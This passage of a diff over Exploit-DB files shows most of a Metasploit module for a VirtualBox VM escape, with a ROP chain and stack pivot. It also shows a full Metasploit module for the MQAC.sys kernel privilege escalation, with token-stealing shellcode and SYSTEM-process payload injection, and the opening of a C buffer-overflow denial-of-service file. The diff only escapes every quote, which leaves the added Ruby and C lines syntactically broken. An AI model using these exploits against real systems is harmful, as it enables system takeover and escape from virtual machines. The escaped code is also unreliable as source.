    if handle == INVALID_HANDLE_VALUE
      return nil
@ -98,25 +98,25 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def send_ioctl(ioctl, msg)
-    result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, "")
+    result = session.railgun.kernel32.DeviceIoControl(@handle, ioctl, msg, msg.length, msg.length, msg.length, 4, \"\")
-    if result["GetLastError"] != 0
+    if result[\"GetLastError\"] != 0
-      unless result["ErrorMessage"].blank?
+      unless result[\"ErrorMessage\"].blank?
-        vprint_error("#{result["ErrorMessage"]}")
+        vprint_error(\"#{result[\"ErrorMessage\"]}\")
      end
      return nil
    end
-    unless result["lpBytesReturned"] && result["lpBytesReturned"] == msg.length
+    unless result[\"lpBytesReturned\"] && result[\"lpBytesReturned\"] == msg.length
-      unless result["ErrorMessage"].blank?
+      unless result[\"ErrorMessage\"].blank?
-        vprint_error("#{result["ErrorMessage"]}")
+        vprint_error(\"#{result[\"ErrorMessage\"]}\")
      end
      return nil
    end
-    unless result["lpOutBuffer"] && result["lpOutBuffer"].unpack("V").first == 0
+    unless result[\"lpOutBuffer\"] && result[\"lpOutBuffer\"].unpack(\"V\").first == 0
-      unless result["ErrorMessage"].blank?
+      unless result[\"ErrorMessage\"].blank?
-        vprint_error("#{result["ErrorMessage"]}")
+        vprint_error(\"#{result[\"ErrorMessage\"]}\")
      end
      return nil
    end
@ -125,10 +125,10 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def connect
-    msg = "\x00" * CONNECT_MSG_SIZE
+    msg = \"\\x00\" * CONNECT_MSG_SIZE
-    msg[4, 4] = [2].pack("V")
+    msg[4, 4] = [2].pack(\"V\")
-    msg[8, "VBoxSharedCrOpenGL".length] = "VBoxSharedCrOpenGL"
+    msg[8, \"VBoxSharedCrOpenGL\".length] = \"VBoxSharedCrOpenGL\"
    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CONNECT, msg)
@ -136,15 +136,15 @@ class Metasploit3 < Msf::Exploit::Local
      return result
    end
-    client_id = result["lpOutBuffer"][136, 4].unpack("V").first
+    client_id = result[\"lpOutBuffer\"][136, 4].unpack(\"V\").first
    client_id
  end
  def disconnect
-    msg = "\x00" * DISCONNECT_MSG_SIZE
+    msg = \"\\x00\" * DISCONNECT_MSG_SIZE
-    msg[4, 4] = [@client_id].pack("V")
+    msg[4, 4] = [@client_id].pack(\"V\")
    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_DISCONNECT, msg)
@ -152,14 +152,14 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def set_pid(pid)
-    msg = "\x00" * SET_PID_MSG_SIZE
+    msg = \"\\x00\" * SET_PID_MSG_SIZE
-    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    msg[0, 4]  = [VERR_WRONG_ORDER].pack(\"V\")
-    msg[4, 4]  = [@client_id].pack("V")  # u32ClientID
+    msg[4, 4]  = [@client_id].pack(\"V\")  # u32ClientID
-    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_PID].pack("V")
+    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_PID].pack(\"V\")
-    msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack(\"V\")
-    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack(\"V\")
-    msg[20, 4] = [pid].pack("V")
+    msg[20, 4] = [pid].pack(\"V\")
    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
@ -167,16 +167,16 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def set_version
-    msg = "\x00" * SET_VERSION_MSG_SIZE
+    msg = \"\\x00\" * SET_VERSION_MSG_SIZE
-    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
+    msg[0, 4]  = [VERR_WRONG_ORDER].pack(\"V\")
-    msg[4, 4]  = [@client_id].pack("V") # u32ClientID
+    msg[4, 4]  = [@client_id].pack(\"V\") # u32ClientID
-    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
+    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack(\"V\")
-    msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack(\"V\")
-    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
-    msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
+    msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack(\"V\")
-    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
-    msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack("V")
+    msg[32, 4] = [CR_PROTOCOL_VERSION_MINOR].pack(\"V\")
    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
@ -184,16 +184,16 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def trigger(buff_addr, buff_length)
-    msg = "\x00" * CALL_EA_MSG_SIZE
+    msg = \"\\x00\" * CALL_EA_MSG_SIZE
-    msg[4, 4] = [@client_id].pack("V")  # u32ClientID
+    msg[4, 4] = [@client_id].pack(\"V\")  # u32ClientID
-    msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V")
+    msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack(\"V\")
-    msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V")
+    msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack(\"V\")
-    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
+    msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack(\"V\")
-    msg[20, 4] = [@client_id].pack("V") # u32ClientID
+    msg[20, 4] = [@client_id].pack(\"V\") # u32ClientID
-    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V")
+    msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack(\"V\")
-    msg[32, 4] = [buff_length].pack("V") # size_of(buf)
+    msg[32, 4] = [buff_length].pack(\"V\") # size_of(buf)
-    msg[36, 4] = [buff_addr].pack("V") # (buf)
+    msg[36, 4] = [buff_addr].pack(\"V\") # (buf)
    result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg)
@ -201,9 +201,9 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def stack_adjustment
-    pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00"  # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB
+    pivot = \"\\x65\\x8b\\x04\\x25\\x10\\x00\\x00\\x00\"  # \"mov eax,dword ptr gs:[10h]\" # Get Stack Bottom from TEB
-    pivot << "\x89\xc4"                         # mov esp, eax                 # Store stack bottom in esp
+    pivot << \"\\x89\\xc4\"                         # mov esp, eax                 # Store stack bottom in esp
-    pivot << "\x81\xC4\x30\xF8\xFF\xFF"         # add esp, -2000               # Plus a little offset...
+    pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\"         # add esp, -2000               # Plus a little offset...
    pivot
  end
@ -222,30 +222,30 @@ class Metasploit3 < Msf::Exploit::Local
      # See at the end of the module for a better description of the ROP Chain,
      # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php
      # All gadgets from VBoxREM.dll
-      opcodes_data = [0x8, 0x30, 0x331].pack("V*")
+      opcodes_data = [0x8, 0x30, 0x331].pack(\"V*\")
-      opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
+      opcodes_data << [0x6a68599a].pack(\"Q<\") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret
-      opcodes_data << [112].pack("Q<") # RDX
+      opcodes_data << [112].pack(\"Q<\") # RDX
-      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret
+      opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 3 # lea rax,[rsp+8] # ret
-      opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret
+      opcodes_data << [0x6a692b1c].pack(\"Q<\") # Gadget 4 # lea rax,[rdx+rax] # ret
-      opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
+      opcodes_data << [0x6a6931d6].pack(\"Q<\") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret
-      opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret
+      opcodes_data << [0x6a68124e].pack(\"Q<\") # Gadget 6 # pop r12 # ret
-      opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
+      opcodes_data << [0x6A70E822].pack(\"Q<\") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect)
-      opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
+      opcodes_data << [0x6a70927d].pack(\"Q<\") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp
      opcodes_data << Rex::Text.pattern_create(80)
-      opcodes_data << [0].pack("Q<")          # 1st arg (lpAddress) # chain will store stack address here
+      opcodes_data << [0].pack(\"Q<\")          # 1st arg (lpAddress) # chain will store stack address here
      opcodes_data << Rex::Text.pattern_create(104 - 80 - 8)
-      opcodes_data << [0x2000].pack("Q<")     # 2nd arg (dwSize)
+      opcodes_data << [0x2000].pack(\"Q<\")     # 2nd arg (dwSize)
      opcodes_data << Rex::Text.pattern_create(140 - 104 - 8)
-      opcodes_data << [0x40].pack("V")        # 3rd arg (flNewProtect)
+      opcodes_data << [0x40].pack(\"V\")        # 3rd arg (flNewProtect)
      opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64)
-      opcodes_data << [0x6A70BB20].pack("V")  # ptr to jmp VirtualProtect instr.
+      opcodes_data << [0x6A70BB20].pack(\"V\")  # ptr to jmp VirtualProtect instr.
-      opcodes_data << "A" * 8
+      opcodes_data << \"A\" * 8
-      opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9
+      opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 9
-      opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10
+      opcodes_data << [0x6a6c9d3d].pack(\"Q<\") # Gadget 10
-      opcodes_data << "\xe9\x5b\x02\x00\x00"  # jmp $+608
+      opcodes_data << \"\\xe9\\x5b\\x02\\x00\\x00\"  # jmp $+608
-      opcodes_data << "A" * (624 - 24 - 5)
+      opcodes_data << \"A\" * (624 - 24 - 5)
-      opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot
+      opcodes_data << [0x6a682a2a].pack(\"Q<\") # Gadget 1 # xchg eax, esp # ret # stack pivot
      opcodes_data << stack_adjustment
      opcodes_data << payload.encoded
      opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length)
@ -256,11 +256,11 @@ class Metasploit3 < Msf::Exploit::Local
      # not reused until the second packet arrives. The second packet,
      # of course, must have 8196 bytes length too. So this memory is
      # reused and code execution can be accomplished.
-      opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*")
+      opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack(\"V*\")
-      opcodes_data << "B" * (8196 - opcodes_data.length)
+      opcodes_data << \"B\" * (8196 - opcodes_data.length)
    end
-    msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data
+    msg = opcodes_hdr.pack(\"V*\") + opcodes.pack(\"C*\") + opcodes_data
    msg
  end
@ -287,53 +287,53 @@ class Metasploit3 < Msf::Exploit::Local
  def exploit
    unless self.respond_to?(target[:messages])
-      print_error("Invalid target specified: no messages callback function defined")
+      print_error(\"Invalid target specified: no messages callback function defined\")
      return
    end
-    print_status("Opening device...")
+    print_status(\"Opening device...\")
    @handle = open_device
    if @handle.nil?
-      fail_with(Failure::NoTarget, "#{DEVICE} device not found")
+      fail_with(Failure::NoTarget, \"#{DEVICE} device not found\")
    else
-      print_good("#{DEVICE} found, exploiting...")
+      print_good(\"#{DEVICE} found, exploiting...\")
    end
-    print_status("Connecting to the service...")
+    print_status(\"Connecting to the service...\")
    @client_id = connect
    if @client_id.nil?
-      fail_with(Failure::Unknown, "Connect operation failed")
+      fail_with(Failure::Unknown, \"Connect operation failed\")
    end
-    print_good("Client ID #{@client_id}")
+    print_good(\"Client ID #{@client_id}\")
-    print_status("Calling SET_VERSION...")
+    print_status(\"Calling SET_VERSION...\")
    result = set_version
    if result.nil?
-      fail_with(Failure::Unknown, "Failed to SET_VERSION")
+      fail_with(Failure::Unknown, \"Failed to SET_VERSION\")
    end
    this_pid = session.sys.process.getpid
-    print_status("Calling SET_PID...")
+    print_status(\"Calling SET_PID...\")
    result = set_pid(this_pid)
    if result.nil?
-      fail_with(Failure::Unknown, "Failed to SET_PID")
+      fail_with(Failure::Unknown, \"Failed to SET_PID\")
    end
    this_proc = session.sys.process.open
-    print_status("Sending First 0xEA Opcode Message to control head_spu...")
+    print_status(\"Sending First 0xEA Opcode Message to control head_spu...\")
    result = send_opcodes_msg(this_proc, 1)
    if result.nil?
-      fail_with(Failure::Unknown, "Failed to control heap_spu...")
+      fail_with(Failure::Unknown, \"Failed to control heap_spu...\")
    end
-    print_status("Sending Second 0xEA Opcode Message to execute payload...")
+    print_status(\"Sending Second 0xEA Opcode Message to execute payload...\")
    @old_timeout = session.response_timeout
    session.response_timeout = 5
    begin
      send_opcodes_msg(this_proc, 2)
    rescue Rex::TimeoutError
-      vprint_status("Expected timeout in case of successful exploitation")
+      vprint_status(\"Expected timeout in case of successful exploitation\")
    end
  end
@ -348,12 +348,12 @@ class Metasploit3 < Msf::Exploit::Local
    end
    unless @client_id.nil?
-      print_status("Disconnecting from the service...")
+      print_status(\"Disconnecting from the service...\")
      disconnect
    end
    unless @handle.nil?
-      print_status("Closing the device...")
+      print_status(\"Closing the device...\")
      session.railgun.kernel32.CloseHandle(@handle)
    end
  end
--- a/platforms/win_x86/local/34167.rb
+++ b/platforms/win_x86/local/34167.rb
@ -3,8 +3,8 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
-require 'msf/core'
+require \'msf/core\'
-require 'rex'
+require \'rex\'
 class Metasploit3 < Msf::Exploit::Local
  Rank = AverageRanking
@ -14,64 +14,64 @@ class Metasploit3 < Msf::Exploit::Local
  def initialize(info={})
    super(update_info(info, {
-      'Name'           => 'MQAC.sys Arbitrary Write Privilege Escalation',
+      \'Name\'           => \'MQAC.sys Arbitrary Write Privilege Escalation\',
-      'Description'    => %q{
+      \'Description\'    => %q{
        A vulnerability within the MQAC.sys module allows an attacker to
        overwrite an arbitrary location in kernel memory.
        This module will elevate itself to SYSTEM, then inject the payload
        into another SYSTEM process.
      },
-      'License'       => MSF_LICENSE,
+      \'License\'       => MSF_LICENSE,
-      'Author'        =>
+      \'Author\'        =>
        [
-          'Matt Bergin', # original exploit and all the hard work
+          \'Matt Bergin\', # original exploit and all the hard work
-          'Spencer McIntyre' # MSF module
+          \'Spencer McIntyre\' # MSF module
        ],
-      'Arch'           => [ ARCH_X86 ],
+      \'Arch\'           => [ ARCH_X86 ],
-      'Platform'       => [ 'win' ],
+      \'Platform\'       => [ \'win\' ],
-      'SessionTypes'   => [ 'meterpreter' ],
+      \'SessionTypes\'   => [ \'meterpreter\' ],
-      'DefaultOptions' =>
+      \'DefaultOptions\' =>
        {
-          'EXITFUNC'   => 'thread',
+          \'EXITFUNC\'   => \'thread\',
        },
-      'Targets'        =>
+      \'Targets\'        =>
        [
-          [ 'Windows XP SP3',
+          [ \'Windows XP SP3\',
            {
-              '_KPROCESS' => "\x44",
+              \'_KPROCESS\' => \"\\x44\",
-              '_TOKEN' => "\xc8",
+              \'_TOKEN\' => \"\\xc8\",
-              '_UPID' => "\x84",
+              \'_UPID\' => \"\\x84\",
-              '_APLINKS' => "\x88"
+              \'_APLINKS\' => \"\\x88\"
            }
          ],
        ],
-      'References'    =>
+      \'References\'    =>
        [
-          [ 'CVE', '2014-4971' ],
+          [ \'CVE\', \'2014-4971\' ],
-          [ 'EDB', '34112' ],
+          [ \'EDB\', \'34112\' ],
-          [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ]
+          [ \'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\' ]
        ],
-      'DisclosureDate'=> 'Jul 22 2014',
+      \'DisclosureDate\'=> \'Jul 22 2014\',
-      'DefaultTarget' => 0
+      \'DefaultTarget\' => 0
    }))
  end
  def find_sys_base(drvname)
-    session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi')
+    session.railgun.add_dll(\'psapi\') if not session.railgun.dlls.keys.include?(\'psapi\')
-    session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]])
+    session.railgun.add_function(\'psapi\', \'EnumDeviceDrivers\', \'BOOL\', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]])
-    session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]])
+    session.railgun.add_function(\'psapi\', \'GetDeviceDriverBaseNameA\', \'DWORD\', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]])
    results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4)
-    addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*")
+    addresses = results[\'lpImageBase\'][0..results[\'lpcbNeeded\'] - 1].unpack(\"L*\")
    addresses.each do |address|
      results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48)
-      current_drvname = results['lpBaseName'][0..results['return'] - 1]
+      current_drvname = results[\'lpBaseName\'][0..results[\'return\'] - 1]
      if drvname == nil
-        if current_drvname.downcase.include?('krnl')
+        if current_drvname.downcase.include?(\'krnl\')
          return [address, current_drvname]
        end
-      elsif drvname == results['lpBaseName'][0..results['return'] - 1]
+      elsif drvname == results[\'lpBaseName\'][0..results[\'return\'] - 1]
        return [address, current_drvname]
      end
    end
@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Local
  # Function borrowed from smart_hashdump
  def get_system_proc
    # Make sure you got the correct SYSTEM Account Name no matter the OS Language
-    local_sys = resolve_sid("S-1-5-18")
+    local_sys = resolve_sid(\"S-1-5-18\")
-    system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
+    system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\"
    this_pid = session.sys.process.getpid
    # Processes that can Blue Screen a host if migrated in to
-    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"]
    session.sys.process.processes.each do |p|
      # Check we are not migrating to a process that can BSOD the host
-      next if dangerous_processes.include?(p["name"])
+      next if dangerous_processes.include?(p[\"name\"])
-      next if p["pid"] == this_pid
+      next if p[\"pid\"] == this_pid
-      next if p["pid"] == 4
+      next if p[\"pid\"] == 4
-      next if p["user"] != system_account_name
+      next if p[\"user\"] != system_account_name
      return p
    end
  end
  def open_device
-    handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil)
+    handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil)
-    if handle['return'] == 0
+    if handle[\'return\'] == 0
-      print_error('Failed to open the \\\\.\\MQAC device')
+      print_error(\'Failed to open the \\\\\\\\.\\\\MQAC device\')
      return nil
    end
-    handle = handle['return']
+    handle = handle[\'return\']
  end
  def check
@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local
    end
    session.railgun.kernel32.CloseHandle(handle)
-    os = sysinfo["OS"]
+    os = sysinfo[\"OS\"]
    case os
    when /windows xp.*service pack 3/i
      return Exploit::CheckCode::Appears
@ -124,79 +124,79 @@ class Metasploit3 < Msf::Exploit::Local
  end
  def exploit
-    if sysinfo["Architecture"] =~ /wow64/i
+    if sysinfo[\"Architecture\"] =~ /wow64/i
-      print_error("Running against WOW64 is not supported")
+      print_error(\"Running against WOW64 is not supported\")
      return
-    elsif sysinfo["Architecture"] =~ /x64/
+    elsif sysinfo[\"Architecture\"] =~ /x64/
-      print_error("Running against 64-bit systems is not supported")
+      print_error(\"Running against 64-bit systems is not supported\")
      return
    end
    if is_system?
-      print_error("This meterpreter session is already running as SYSTEM")
+      print_error(\"This meterpreter session is already running as SYSTEM\")
      return
    end
    kernel_info = find_sys_base(nil)
    base_addr = 0xffff
-    print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}")
+    print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\")
    handle = open_device
    return if handle.nil?
    this_proc = session.sys.process.open
    unless this_proc.memory.writable?(base_addr)
-      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE")
+      session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\")
    end
    unless this_proc.memory.writable?(base_addr)
-      print_error('Failed to properly allocate memory')
+      print_error(\'Failed to properly allocate memory\')
      this_proc.close
      return
    end
    hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1)
-    hKernel = hKernel['return']
+    hKernel = hKernel[\'return\']
-    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable")
+    halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\")
-    halDispatchTable = halDispatchTable['return']
+    halDispatchTable = halDispatchTable[\'return\']
    halDispatchTable -= hKernel
    halDispatchTable += kernel_info[0]
-    print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}")
+    print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\")
-    tokenstealing  = "\x52"                                                        # push edx                         # Save edx on the stack
+    tokenstealing  = \"\\x52\"                                                        # push edx                         # Save edx on the stack
-    tokenstealing << "\x53"                                                        # push ebx                         # Save ebx on the stack
+    tokenstealing << \"\\x53\"                                                        # push ebx                         # Save ebx on the stack
-    tokenstealing << "\x33\xc0"                                                    # xor eax, eax                     # eax = 0
+    tokenstealing << \"\\x33\\xc0\"                                                    # xor eax, eax                     # eax = 0
-    tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
+    tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\"                                # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD
-    tokenstealing << "\x8b\x40" + target['_KPROCESS']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
+    tokenstealing << \"\\x8b\\x40\" + target[\'_KPROCESS\']                              # mov eax, dword ptr [eax+44h]     # Retrieve _KPROCESS
-    tokenstealing << "\x8b\xc8"                                                    # mov ecx, eax
+    tokenstealing << \"\\x8b\\xc8\"                                                    # mov ecx, eax
-    tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
+    tokenstealing << \"\\x8b\\x98\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\"                # mov ebx, dword ptr [eax+0C8h]    # Retrieves TOKEN
-    tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
+    tokenstealing << \"\\x8b\\x80\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\"              # mov eax, dword ptr [eax+88h]  <====| # Retrieve FLINK from ActiveProcessLinks
-    tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
+    tokenstealing << \"\\x81\\xe8\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\"              # sub eax,88h                        | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
-    tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
+    tokenstealing << \"\\x81\\xb8\" + target[\'_UPID\'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4         | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
-    tokenstealing << "\x75\xe8"                                                    # jne 0000101e ======================
+    tokenstealing << \"\\x75\\xe8\"                                                    # jne 0000101e ======================
-    tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
+    tokenstealing << \"\\x8b\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\"                # mov edx,dword ptr [eax+0C8h]     # Retrieves TOKEN and stores on EDX
-    tokenstealing << "\x8b\xc1"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
+    tokenstealing << \"\\x8b\\xc1\"                                                    # mov eax, ecx                     # Retrieves KPROCESS stored on ECX
-    tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
+    tokenstealing << \"\\x89\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\"                # mov dword ptr [eax+0C8h],edx     # Overwrites the TOKEN for the current KPROCESS
-    tokenstealing << "\x5b"                                                        # pop ebx                          # Restores ebx
+    tokenstealing << \"\\x5b\"                                                        # pop ebx                          # Restores ebx
-    tokenstealing << "\x5a"                                                        # pop edx                          # Restores edx
+    tokenstealing << \"\\x5a\"                                                        # pop edx                          # Restores edx
-    tokenstealing << "\xc2\x10"                                                    # ret 10h                          # Away from the kernel!
+    tokenstealing << \"\\xc2\\x10\"                                                    # ret 10h                          # Away from the kernel!
    shellcode = make_nops(0x200) + tokenstealing
    this_proc.memory.write(0x1, shellcode)
    this_proc.close
-    print_status("Triggering vulnerable IOCTL")
+    print_status(\"Triggering vulnerable IOCTL\")
    session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0)
    result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4)
    unless is_system?
-      print_error("Exploit failed")
+      print_error(\"Exploit failed\")
      return
    end
    proc = get_system_proc
-    print_status("Injecting the payload into SYSTEM process: #{proc['name']}")
+    print_status(\"Injecting the payload into SYSTEM process: #{proc[\'name\']}\")
-    unless execute_shellcode(payload.encoded, nil, proc['pid'])
+    unless execute_shellcode(payload.encoded, nil, proc[\'pid\'])
-      fail_with(Failure::Unknown, "Error while executing the payload")
+      fail_with(Failure::Unknown, \"Error while executing the payload\")
    end
  end
--- a/platforms/windows/dos/10603.c
+++ b/platforms/windows/dos/10603.c
@ -14,43 +14,43 @@
 #include <stdio.h>
 #include <windows.h>
-#pragma comment(lib, "ws2_32.lib")
+#pragma comment(lib, \"ws2_32.lib\")
 char Buffer_Overflow[] =
-"\x00\x02"
+\"\\x00\\x02\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes...
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // A = 41. 300 bytes...
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
-"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
+\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\"
